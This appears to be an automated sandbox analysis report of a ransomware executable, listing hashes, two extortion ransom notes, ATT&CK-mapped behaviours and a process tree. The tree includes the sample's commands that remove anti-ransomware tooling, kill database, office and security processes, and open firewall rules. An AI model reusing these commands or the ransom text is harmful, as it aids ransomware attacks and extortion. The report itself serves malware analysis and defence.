d10d3e09e1f93ccc06ccaa71c4b5e2bacaae2074024ffa7345362c01479ff5a8

Analysis

max time kernel
145s
max time network
57s
platform
windows10_x64
resource
win10v20210408
submitted
17/05/2021, 09:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sample.exe
Size

142KB
MD5

e1f063d63a75e0e0e864052b1a50ab06
SHA1

75d941a28cf0ade2ef2c16dfacbdeb36a51ccaf7
SHA256

8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7
SHA512

25681b210ee18bd60ba3fef496769283d51dc516569e1f1834d6d23a5927c1684b25ff67baf5fba66c908b364a13784f49facdde7a98b2fb8a8a41a2ec792ae3

Score

10^/10

evasion persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. -------------------------------------------------------------------------------- We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. -------------------------------------------------------------------------------- As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it's run. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. -------------------------------------------------------------------------------- !!!!!!!!!!!!!!!!!!!!!!!! If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. !!!!!!!!!!!!!!!!!!!!!!!!! -------------------------------------------------------------------------------- It doesn't matter to us what you choose pay us or we will sell your data. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: ____________________________________________________________________________________ You have two ways: 1) [Recommended] Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454 and paste it in the Tor browser. c. Start a chat and follow the further instructions. 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a. Open your any browser (Chrome, Firefox, Opera, IE, Edge) b. Open our secondary website: http://prometheusdec.in/ticket.php?track=141-5D9-Y454 c. Start a chat and follow the further instructions. Warning: secondary website can be blocked, thats why first variant much better and more available. _____________________________________________________________________________________ Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: pP4e5LxGe5yVfk/UP/5ZYSMVY/kzKfljeslWL5+jsSun78Le/U/bBLtpsTWvgnt0cuzMPQbi4Rfwhb2ghwSS4hLngOHhUMyYjtE8fsWtLNdDaiNQTcybs+0rdEEU3ZstU5YDxFtTb13Q7zJB7w13Tav0WEgiQ2M8r/3uXapW31rgyWMe4cF4Uxe3Zffb6dw4Id35YXXft0CmjRHiNdwJkKzSlsWU9RafxJcnERVo8F45wmJxGpUfgOhYNrR7GzKg95HqzID6XNDpANmyqHFnTCNkIyVq/7JvWEH+mu/o9rFTeHrOMdtWnRi4ddheWTVogzJuqAm+MrxPooas6KA17Vk/V4qj/IaTuMdXTvIm2ol4+59GBILfFhtc9MJ1hpyWT+HTVorYeTlijK24y7TVImfJuLWMi+lQZt2f94cEJ4u2uNjh4vZvKU5p8GgNArkCGdrJymatUgbADjAzUF1jWh3GJXkrDlXSpRHi3t5jY+eyKPYXMxpK4sYl0bXPba/ClUErOk4uYvAtPNAPUjfr0uaVZEv3L+MT0USl4TTjNQ/q3iq+J+q4dw6aVkuNWHdIAqrWUS2dORmLtmOTiFyer4JdVOVRt3owSx9wY0BkUDpJBrqgLvlW2zneIpL4ySSd/KjUtbpmiwryz9+Sb99kgYBuL21wDiiGTAUCtKka9zw=

URLs

http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454

http://prometheusdec.in/ticket.php?track=141-5D9-Y454

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after itâ€™s installation. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. It doesn't matter to us what you choose pay us or we will sell your data. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: You have two ways: 1) [Recommended] Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454 and paste it in the Tor browser. c. Start a chat and follow the further instructions. 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a. Open your any browser (Chrome, Firefox, Opera, IE, Edge) b. Open our secondary website: http://prometheusdec.in/ticket.php?track=141-5D9-Y454 c. Start a chat and follow the further instructions. Warning: secondary website can be blocked, thats why first variant much better and more available. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: pP4e5LxGe5yVfk/UP/5ZYSMVY/kzKfljeslWL5+jsSun78Le/U/bBLtpsTWvgnt0cuzMPQbi4Rfwhb2ghwSS4hLngOHhUMyYjtE8fsWtLNdDaiNQTcybs+0rdEEU3ZstU5YDxFtTb13Q7zJB7w13Tav0WEgiQ2M8r/3uXapW31rgyWMe4cF4Uxe3Zffb6dw4Id35YXXft0CmjRHiNdwJkKzSlsWU9RafxJcnERVo8F45wmJxGpUfgOhYNrR7GzKg95HqzID6XNDpANmyqHFnTCNkIyVq/7JvWEH+mu/o9rFTeHrOMdtWnRi4ddheWTVogzJuqAm+MrxPooas6KA17Vk/V4qj/IaTuMdXTvIm2ol4+59GBILfFhtc9MJ1hpyWT+HTVorYeTlijK24y7TVImfJuLWMi+lQZt2f94cEJ4u2uNjh4vZvKU5p8GgNArkCGdrJymatUgbADjAzUF1jWh3GJXkrDlXSpRHi3t5jY+eyKPYXMxpK4sYl0bXPba/ClUErOk4uYvAtPNAPUjfr0uaVZEv3L+MT0USl4TTjNQ/q3iq+J+q4dw6aVkuNWHdIAqrWUS2dORmLtmOTiFyer4JdVOVRt3owSx9wY0BkUDpJBrqgLvlW2zneIpL4ySSd/KjUtbpmiwryz9+Sb99kgYBuL21wDiiGTAUCtKka9zw=

URLs

http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454

http://prometheusdec.in/ticket.php?track=141-5D9-Y454

Signatures

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	sample.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 48 IoCs

evasion

pid	Process
2104	taskkill.exe
3688	taskkill.exe
2100	taskkill.exe
3632	taskkill.exe
2188	taskkill.exe
1508	taskkill.exe
3800	taskkill.exe
2888	taskkill.exe
2252	taskkill.exe
2260	taskkill.exe
980	taskkill.exe
1540	taskkill.exe
2664	taskkill.exe
564	taskkill.exe
748	taskkill.exe
3960	taskkill.exe
3796	taskkill.exe
3716	taskkill.exe
3884	taskkill.exe
2664	taskkill.exe
4088	taskkill.exe
2452	taskkill.exe
716	taskkill.exe
980	taskkill.exe
3620	taskkill.exe
404	taskkill.exe
2264	taskkill.exe
3068	taskkill.exe
1568	taskkill.exe
3796	taskkill.exe
3984	taskkill.exe
1144	taskkill.exe
3240	taskkill.exe
4064	taskkill.exe
1764	taskkill.exe
3068	taskkill.exe
3104	taskkill.exe
716	taskkill.exe
2832	taskkill.exe
3784	taskkill.exe
3424	taskkill.exe
740	taskkill.exe
3012	taskkill.exe
1824	taskkill.exe
2960	taskkill.exe
3452	taskkill.exe
2364	taskkill.exe
4056	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	OpenWith.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1288	reg.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
3668	NOTEPAD.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4072	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe
620	sample.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1780	OpenWith.exe
1508	OpenWith.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeDebugPrivilege	620	sample.exe
Token: SeDebugPrivilege	3960	taskkill.exe
Token: SeDebugPrivilege	740	taskkill.exe
Token: SeDebugPrivilege	716	taskkill.exe
Token: SeDebugPrivilege	980	taskkill.exe
Token: SeDebugPrivilege	4064	taskkill.exe
Token: SeDebugPrivilege	3716	taskkill.exe
Token: SeDebugPrivilege	3796	taskkill.exe
Token: SeDebugPrivilege	3884	taskkill.exe
Token: SeDebugPrivilege	2664	taskkill.exe
Token: SeDebugPrivilege	3620	taskkill.exe
Token: SeDebugPrivilege	564	taskkill.exe
Token: SeDebugPrivilege	404	taskkill.exe
Token: SeDebugPrivilege	2264	taskkill.exe
Token: SeDebugPrivilege	2252	taskkill.exe
Token: SeDebugPrivilege	2100	taskkill.exe
Token: SeDebugPrivilege	2260	taskkill.exe
Token: SeDebugPrivilege	3012	taskkill.exe
Token: SeDebugPrivilege	3632	taskkill.exe
Token: SeDebugPrivilege	2188	taskkill.exe
Token: SeDebugPrivilege	1764	taskkill.exe
Token: SeDebugPrivilege	980	taskkill.exe
Token: SeDebugPrivilege	1824	taskkill.exe
Token: SeDebugPrivilege	4088	taskkill.exe
Token: SeDebugPrivilege	1540	taskkill.exe
Token: SeDebugPrivilege	2960	taskkill.exe
Token: SeDebugPrivilege	1508	taskkill.exe
Token: SeDebugPrivilege	2364	taskkill.exe
Token: SeDebugPrivilege	1568	taskkill.exe
Token: SeDebugPrivilege	3796	taskkill.exe
Token: SeDebugPrivilege	2452	taskkill.exe
Token: SeDebugPrivilege	3068	taskkill.exe
Token: SeDebugPrivilege	748	taskkill.exe
Token: SeDebugPrivilege	3452	taskkill.exe
Token: SeDebugPrivilege	3800	taskkill.exe
Token: SeDebugPrivilege	4056	taskkill.exe
Token: SeDebugPrivilege	2832	taskkill.exe
Token: SeDebugPrivilege	3104	taskkill.exe
Token: SeDebugPrivilege	3984	taskkill.exe
Token: SeDebugPrivilege	1144	taskkill.exe
Token: SeDebugPrivilege	3784	taskkill.exe
Token: SeDebugPrivilege	3424	taskkill.exe
Token: SeDebugPrivilege	2104	taskkill.exe
Token: SeDebugPrivilege	2888	taskkill.exe
Token: SeDebugPrivilege	716	taskkill.exe
Token: SeDebugPrivilege	3240	taskkill.exe
Token: SeDebugPrivilege	3688	taskkill.exe
Token: SeDebugPrivilege	3068	taskkill.exe
Token: SeDebugPrivilege	2060	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
620	sample.exe
620	sample.exe
620	sample.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
620	sample.exe
620	sample.exe
620	sample.exe

Suspicious use of SetWindowsHookEx 19 IoCs

pid	Process
188	mshta.exe
1780	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 620 wrote to memory of 3960	620	sample.exe	76
PID 620 wrote to memory of 3960	620	sample.exe	76
PID 620 wrote to memory of 3984	620	sample.exe	78
PID 620 wrote to memory of 3984	620	sample.exe	78
PID 620 wrote to memory of 1288	620	sample.exe	80
PID 620 wrote to memory of 1288	620	sample.exe	80
PID 620 wrote to memory of 1956	620	sample.exe	82
PID 620 wrote to memory of 1956	620	sample.exe	82
PID 620 wrote to memory of 1704	620	sample.exe	84
PID 620 wrote to memory of 1704	620	sample.exe	84
PID 620 wrote to memory of 1496	620	sample.exe	85
PID 620 wrote to memory of 1496	620	sample.exe	85
PID 620 wrote to memory of 4036	620	sample.exe	87
PID 620 wrote to memory of 4036	620	sample.exe	87
PID 620 wrote to memory of 2208	620	sample.exe	90
PID 620 wrote to memory of 2208	620	sample.exe	90
PID 620 wrote to memory of 2152	620	sample.exe	93
PID 620 wrote to memory of 2152	620	sample.exe	93
PID 620 wrote to memory of 3968	620	sample.exe	94
PID 620 wrote to memory of 3968	620	sample.exe	94
PID 620 wrote to memory of 4012	620	sample.exe	95
PID 620 wrote to memory of 4012	620	sample.exe	95
PID 620 wrote to memory of 1764	620	sample.exe	97
PID 620 wrote to memory of 1764	620	sample.exe	97
PID 620 wrote to memory of 740	620	sample.exe	100
PID 620 wrote to memory of 740	620	sample.exe	100
PID 620 wrote to memory of 716	620	sample.exe	101
PID 620 wrote to memory of 716	620	sample.exe	101
PID 620 wrote to memory of 980	620	sample.exe	104
PID 620 wrote to memory of 980	620	sample.exe	104
PID 620 wrote to memory of 3976	620	sample.exe	106
PID 620 wrote to memory of 3976	620	sample.exe	106
PID 620 wrote to memory of 3716	620	sample.exe	111
PID 620 wrote to memory of 3716	620	sample.exe	111
PID 620 wrote to memory of 4064	620	sample.exe	108
PID 620 wrote to memory of 4064	620	sample.exe	108
PID 620 wrote to memory of 3796	620	sample.exe	109
PID 620 wrote to memory of 3796	620	sample.exe	109
PID 620 wrote to memory of 3884	620	sample.exe	114
PID 620 wrote to memory of 3884	620	sample.exe	114
PID 620 wrote to memory of 2664	620	sample.exe	116
PID 620 wrote to memory of 2664	620	sample.exe	116
PID 620 wrote to memory of 3620	620	sample.exe	118
PID 620 wrote to memory of 3620	620	sample.exe	118
PID 620 wrote to memory of 564	620	sample.exe	119
PID 620 wrote to memory of 564	620	sample.exe	119
PID 620 wrote to memory of 404	620	sample.exe	122
PID 620 wrote to memory of 404	620	sample.exe	122
PID 620 wrote to memory of 2264	620	sample.exe	124
PID 620 wrote to memory of 2264	620	sample.exe	124
PID 620 wrote to memory of 2252	620	sample.exe	126
PID 620 wrote to memory of 2252	620	sample.exe	126
PID 620 wrote to memory of 2100	620	sample.exe	128
PID 620 wrote to memory of 2100	620	sample.exe	128
PID 620 wrote to memory of 2260	620	sample.exe	130
PID 620 wrote to memory of 2260	620	sample.exe	130
PID 620 wrote to memory of 3632	620	sample.exe	132
PID 620 wrote to memory of 3632	620	sample.exe	132
PID 620 wrote to memory of 3012	620	sample.exe	135
PID 620 wrote to memory of 3012	620	sample.exe	135
PID 620 wrote to memory of 2188	620	sample.exe	136
PID 620 wrote to memory of 2188	620	sample.exe	136
PID 620 wrote to memory of 980	620	sample.exe	138
PID 620 wrote to memory of 980	620	sample.exe	138

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	sample.exe

C:\Users\Admin\AppData\Local\Temp\sample.exe
"C:\Users\Admin\AppData\Local\Temp\sample.exe"
1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:620
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3960
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:3984
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:1288
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:1956
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:1704
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1496
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:4036
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:2208
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:2152
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:3968
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:4012
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:1764
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:740
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:716
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:980
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:3976
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4064
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3796
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3716
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3884
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2664
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3620
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:564
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:404
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2264
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2252
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2100
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2260
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3632
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3012
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2188
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:980
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1764
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1824
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1540
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4088
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2960
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1508
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:2664
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2364
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1568
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3796
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2452
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3068
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:748
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3800
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3452
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4056
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2832
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3104
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3984
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1144
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3784
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3424
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2104
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2888
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:716
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:1616
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
